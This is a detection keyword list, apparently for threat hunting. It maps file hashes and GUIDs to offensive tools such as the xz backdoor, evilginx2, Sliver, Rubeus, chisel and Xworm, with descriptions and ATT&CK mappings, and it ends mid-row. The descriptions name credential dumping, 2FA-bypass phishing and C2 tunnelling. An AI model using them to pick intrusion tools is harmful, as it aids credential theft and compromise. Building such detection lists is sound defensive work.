"*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1*",".{0,1000}654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/654c673c177a2a06c2b240ee07f81dc9096b1626f82855dc67722a5e10bbf6a1","10","10","N/A","N/A","N/A","N/A" "*6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395*",".{0,1000}6555c9310f7087fcf0b38eab5ad4efc6ec91566ff5bf2fbbed4e63c88611c395.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6563686f2048656c6c6f204261636b646f6f72*",".{0,1000}6563686f2048656c6c6f204261636b646f6f72.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" "*65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632*",".{0,1000}65696f93bce6d78c8e377fc3c4c56123f49f26a621a332bc764c274aa7c81632.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1*",".{0,1000}65774c65f7813f8e95a746597c723006732bf331843e2ebe92c19425b22139a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9*",".{0,1000}6584e5af96fd6148ff49ba1c19fd9500024126b231bd78c331ae66c8f45956c9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474*",".{0,1000}65870fa19a49b230121166915868f5dfa7f821ed376ffaef3b181c7669c21474.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*658C8B7F-3664-4A95-9572-A3E5871DFC06*",".{0,1000}658C8B7F\-3664\-4A95\-9572\-A3E5871DFC06.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b*",".{0,1000}65e2792774eff8fec2ccb9280300fca6f465c06df13c4bcebb553b18c4aafc2b.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd*",".{0,1000}65ed54763a97588f5ace7c38d2cdbcf925dd65f2d5fb3ca1548b23c7efb54efd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330*",".{0,1000}65efc0f2db588996d96021ce4be127ac2b18800d9d35c8a1a5aa7d3140370330.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8*",".{0,1000}6634da3e8e2590317704a1ddcba7fcc177aa5f532d81717431d0a6668d9594c8.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba*",".{0,1000}6641564c893c3cb1dff02607a922afdaaa48ba93b0bc35cc90094fb653ee3dba.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75*",".{0,1000}665593018e2d7938198172532fad4e17c501253b1a75106904d0eb50bf2b8c75.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a*",".{0,1000}665a22568c5d38db4ce74dde13053e8a66baf91356e4f35a9e2957c205a09f1a.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad*",".{0,1000}6690cb6d6fa47260c2cf4ac43b64d2d46e7a7ae4f8d0f10f4fce5d423a1dacad.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*66AA4619-4D0F-4226-9D96-298870E9BB50*",".{0,1000}66AA4619\-4D0F\-4226\-9D96\-298870E9BB50.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162*",".{0,1000}66c00239681d0f5822544fa18f461864df248a0dc5a76c4a3f981dac5af89162.{0,1000}","offensive_tool_keyword","AMSITrigger","AMSITrigger will identify all of the malicious strings in a powershell file by repeatedly making calls to AMSI using AMSIScanBuffer - line by line. On receiving an AMSI_RESULT_DETECTED response code the line will then be scrutinised to identify the individual triggers","T1059.001 - T1218.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RythmStick/AMSITrigger","1","0","https://www.rythmstick.net/posts/amsitrigger/","10","10","N/A","N/A","N/A","N/A" "*66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0*",".{0,1000}66c368f799227a9b571f841057e2d5f12c862360d5f7f564da9936acd67c66a0.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*66e0681a500c726ed52e5ea9423d2654*",".{0,1000}66e0681a500c726ed52e5ea9423d2654.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "*675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6*",".{0,1000}675936ffca92c0a0cd91495a62d395bb5c2ab3752f3d2451a821af2fd2f63fb6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e*",".{0,1000}675f1d8076801a64dc3c39916e52ac7b345b7d1c9454a01f270ca9796dd86f7e.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f*",".{0,1000}67606cb8ee6060aabae4dc8f24fad06d058363de920ab03511168840fc96111f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b*",".{0,1000}676766b4b6296303a601cf2191da028cc39681fa69b1da408242882f760c849b.{0,1000}","offensive_tool_keyword","tricky.lnk","VBS that creates a .lnk file spoofing the file extension with unicode chars that reverses the .lnk file extension. appends .txt to the end and changes the icon to notepad to make it appear as a textfile. When executed. the payload is a powershell webdl and execute","T1027 - T1036 - T1218.010","TA0002 - TA0003 - TA0008","N/A","N/A","Phishing","https://github.com/xillwillx/tricky.lnk","1","0","N/A","N/A","2","108","35","2020-12-19T23:42:10Z","2016-10-26T21:25:06Z" "*67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb*",".{0,1000}67681fc7c1c0d06af7eedea1eb1f1d04e2f7f34f47e1ce3ceca7e4b93e318ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*676E89F3-4785-477A-BA1C-B30340F598D5*",".{0,1000}676E89F3\-4785\-477A\-BA1C\-B30340F598D5.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28*",".{0,1000}67831df0ff8ed3ffacc3678a5c4c09a3fcb755ffbfc110d6f1ff61fe65f31d28.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e*",".{0,1000}6788355188c40674e65fd8d2bd610ec4be42d1a5d78116990c0d109863c39a3e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*678ce24e-70c4-47b1-b595-ca0835ba35d9*",".{0,1000}678ce24e\-70c4\-47b1\-b595\-ca0835ba35d9.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3*",".{0,1000}67a5ff45328aa8bc9b0bb4a131dfe70a82bab7ad6c44074c9973421f27ff4fa3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287*",".{0,1000}67c1cafb276ad174a24340f989c220db9a8997650b2f86cbc95a6979e73b4287.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5*",".{0,1000}67d9b4b35c02a19ab364ad19e1972645eb98e24dcd6f1715d2a26229deb2ccf5.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6*",".{0,1000}68176e317f4294f7ed8cac8f270a3fcfb1a03000831ea6594c374d2318e976c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b*",".{0,1000}685cc5e58579e5f5a176e2be355398579f46cd64dfd0a0e82edf12316fc33b5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615*",".{0,1000}68af509fd4c4e58e7cc291316b72dacc5bf2861340ac83da5fc1287a38f0e615.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3*",".{0,1000}68cfcef00c7be228c8c10ec35874bbbf3e3a6eec33ce3c2697af0aa8bcf844d3.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9*",".{0,1000}68d9f28535974326ecf0a8746d0c6e8c7ccf4ac464f083eb375f998f2eb52ab9.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a*",".{0,1000}68e3ce34f0d904e715ea8471373abc3632bfe4fd945e1a4976baa18d003dff7a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b*",".{0,1000}6905595a21a2a1d669fb80a6fd3f97db4692d98ad9e33eae64466c7cfbaabb8b.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e*",".{0,1000}691f577714a4ae22bc22ec49edec5a15bf546a9827e8e1cf4e9e688b2ba9f72e.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/CiscoCXSecurity/linikatz","1","0","N/A","10","5","493","75","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z" "*692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda*",".{0,1000}692110b2f60de3d52ac15e84be38fab5f9a16249b2bb0011af047b174efceeda.{0,1000}","offensive_tool_keyword","UnmanagedPowerShell","Executes PowerShell from an unmanaged process","T1059 - T1086","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/leechristensen/UnmanagedPowerShell","1","0","N/A","6","5","461","108","2016-03-17T05:20:55Z","2014-12-15T00:59:03Z" "*6952343cc4614857f83dbb81247871e7*",".{0,1000}6952343cc4614857f83dbb81247871e7.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*",".{0,1000}6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d*",".{0,1000}6975b175e41c894651afbb12b63a2254a405875733c348c204ca96b2fb81790d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 